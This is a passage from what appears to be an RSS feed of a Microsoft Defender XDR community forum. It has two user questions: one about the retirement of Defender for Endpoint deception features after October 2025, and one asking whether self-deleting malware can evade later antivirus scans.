      <description>&lt;P&gt;Hi Everyone,&lt;BR /&gt;I hope this topic is going to help someone.&lt;BR /&gt;I want to know after 31 of October 2025&lt;/P&gt;&lt;img /&gt;&lt;P&gt;Does that mean that no one can run Deceptions and policy rules, etc?&lt;BR /&gt;As at the moment I'm experiencing this:&lt;/P&gt;&lt;img /&gt;&lt;P&gt;&lt;BR /&gt;It would be good to know if I have to deal with it and look into what the issue is, as I'm using Zscaler. The issue is definitely there after running a number of commands to check the reg key, etc.&lt;BR /&gt;Can someone provide me with any documentation if this will be fully retired or will still be functioning to some point?&lt;/P&gt;</description>
      <pubDate>Tue, 28 Oct 2025 16:46:12 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/defender-for-endpoint-deception/m-p/4464792#M2559</guid>
      <dc:creator>StanPetrov</dc:creator>
      <dc:date>2025-10-28T16:46:12Z</dc:date>
    </item>
    <item>
      <title>Question malware autodelete</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/question-malware-autodelete/m-p/4464202#M2558</link>
      <description>&lt;P&gt;A malware like Trojan:Win32/Wacatac.C!ml can download other malware, this other malware can perform the malicious action, this malware can delete itself and in the next scan of antivirus free this malware that deleted itself will not have any trace and will not be detected by the scan?&lt;/P&gt;</description>
      <pubDate>Sat, 25 Oct 2025 15:28:51 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/question-malware-autodelete/m-p/4464202#M2558</guid>
      <dc:creator>cloudff7</dc:creator>
      <dc:date>2025-10-25T15:28:51Z</dc:date>
    </item>
  </channel>
</rss>

